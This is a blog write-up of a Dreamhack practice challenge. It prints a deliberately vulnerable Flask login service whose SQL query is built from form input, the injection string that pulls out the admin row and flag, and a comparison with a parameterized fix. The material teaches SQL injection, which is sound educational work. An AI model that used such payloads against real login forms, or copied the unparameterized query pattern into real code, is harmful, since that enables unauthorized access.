🔒 Cyber Security/Web Hacking (웹해킹)

[Dreamhack] Dreamhack Web Hacking: simple_sqli_chatgpt

선달 2023. 11. 20. 17:06

https://dreamhack.io/wargame/challenges/769

 

simple_sqli_chatgpt

A login service that is somehow strange. Obtain the flag through the SQL INJECTION vulnerability. The flag is in flag.txt, in the FLAG variable. Try solving it together with chatGPT! Reference: Server-side Basic

dreamhack.io

 

Problem description

A login service that is somehow strange.
Obtain the flag through the SQL INJECTION vulnerability. The flag is in flag.txt, in the FLAG variable.
Try solving it together with chatGPT!

#!/usr/bin/python3
from flask import Flask, request, render_template, g
import sqlite3
import os
import binascii

app = Flask(__name__)
app.secret_key = os.urandom(32)

try:
    FLAG = open('./flag.txt', 'r').read()
except:
    FLAG = '[**FLAG**]'

DATABASE = "database.db"
if os.path.exists(DATABASE) == False:
    db = sqlite3.connect(DATABASE)
    db.execute('create table users(userid char(100), userpassword char(100), userlevel integer);')
    db.execute(f'insert into users(userid, userpassword, userlevel) values ("guest", "guest", 0), ("admin", "{binascii.hexlify(os.urandom(16)).decode("utf8")}", 0);')
    db.commit()
    db.close()

def get_db():
    db = getattr(g, '_database', None)
    if db is None:
        db = g._database = sqlite3.connect(DATABASE)
    db.row_factory = sqlite3.Row
    return db

def query_db(query, one=True):
    cur = get_db().execute(query)
    rv = cur.fetchall()
    cur.close()
    return (rv[0] if rv else None) if one else rv

@app.teardown_appcontext
def close_connection(exception):
    db = getattr(g, '_database', None)
    if db is not None:
        db.close()

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        userlevel = request.form.get('userlevel')
        res = query_db(f"select * from users where userlevel='{userlevel}'")
        if res:
            userid = res[0]
            userlevel = res[2]
            print(userid, userlevel)
            if userid == 'admin' and userlevel == 0:
                return f'hello {userid} flag is {FLAG}'
            return f'<script>alert("hello {userid}");history.go(-1);</script>'
        return '<script>alert("wrong");history.go(-1);</script>'

app.run(host='0.0.0.0', port=8000)

 

Solution

It really is a strange login service somehow

 

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        userlevel = request.form.get('userlevel')
        res = query_db(f"select * from users where userlevel='{userlevel}'")
        if res:
            userid = res[0]
            userlevel = res[2]
            print(userid, userlevel)
            if userid == 'admin' and userlevel == 0:
                return f'hello {userid} flag is {FLAG}'
            return f'<script>alert("hello {userid}");history.go(-1);</script>'
        return '<script>alert("wrong");history.go(-1);</script>'

 

The source is a bit long, but in the end it means that the flag is shown when the form is submitted in a way that makes the looked-up row have userid admin and userlevel 0.

 

select * from users where userlevel='{userlevel}'

 

This is the SQL statement

select * from users where userlevel='0' and userid='admin'

 

0' and userid='admin 

If you put this into the userlevel field, the query is assembled so that it matches the condition (the quote closes the string literal and the rest becomes part of the WHERE clause).
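To make the root cause concrete, here is an added example (not the blog author's code and not the Dreamhack challenge source) that rebuilds the challenge's users table in an in-memory SQLite database and runs the same query twice: once assembled with an f-string exactly as the challenge does, and once with a bound parameter. The admin password is a placeholder rather than the random value the real service generates, and the function names are mine.

```python
import sqlite3

# Constructed in-memory copy of the challenge's users table. The real admin
# password is 16 random bytes in hex; a labelled placeholder stands in here.
def make_db():
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.execute(
        "create table users(userid char(100), userpassword char(100), userlevel integer);"
    )
    db.execute(
        "insert into users(userid, userpassword, userlevel) values "
        "('guest', 'guest', 0), ('admin', '<random-hex-placeholder>', 0);"
    )
    db.commit()
    return db


def lookup_vulnerable(db, userlevel):
    """Mirrors the challenge: the form value is pasted into the SQL text,
    so a quote in the input changes the statement's structure."""
    cur = db.execute(f"select * from users where userlevel='{userlevel}'")
    row = cur.fetchone()
    return row["userid"] if row else None


def lookup_fixed(db, userlevel):
    """Same query with a bound parameter: the form value is always data.
    SQLite applies numeric affinity to the bound text, so '0' still matches
    the integer column, while a string containing a quote matches nothing."""
    cur = db.execute("select * from users where userlevel=?", (userlevel,))
    row = cur.fetchone()
    return row["userid"] if row else None


def gets_flag(db, userlevel, lookup):
    """Replicates the challenge's success condition: the first matching row
    must be admin with userlevel 0."""
    cur = (
        db.execute(f"select * from users where userlevel='{userlevel}'")
        if lookup is lookup_vulnerable
        else db.execute("select * from users where userlevel=?", (userlevel,))
    )
    row = cur.fetchone()
    return bool(row) and row["userid"] == "admin" and row["userlevel"] == 0


if __name__ == "__main__":
    db = make_db()
    payload = "0' and userid='admin"   # the input discussed in the write-up
    print("vulnerable, normal input :", lookup_vulnerable(db, "0"))
    print("vulnerable, injected     :", lookup_vulnerable(db, payload))
    print("fixed, normal input      :", lookup_fixed(db, "0"))
    print("fixed, injected          :", lookup_fixed(db, payload))
```

With a plain `0` both versions return the first level-0 row (guest). With the write-up's input, only the string-formatted query returns the admin row; the parameterized one returns nothing, because the whole string is compared against the integer column as a single value and never parsed as SQL.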

 

A problem so simple that it feels suspicious

 

๋ฐ˜์‘ํ˜•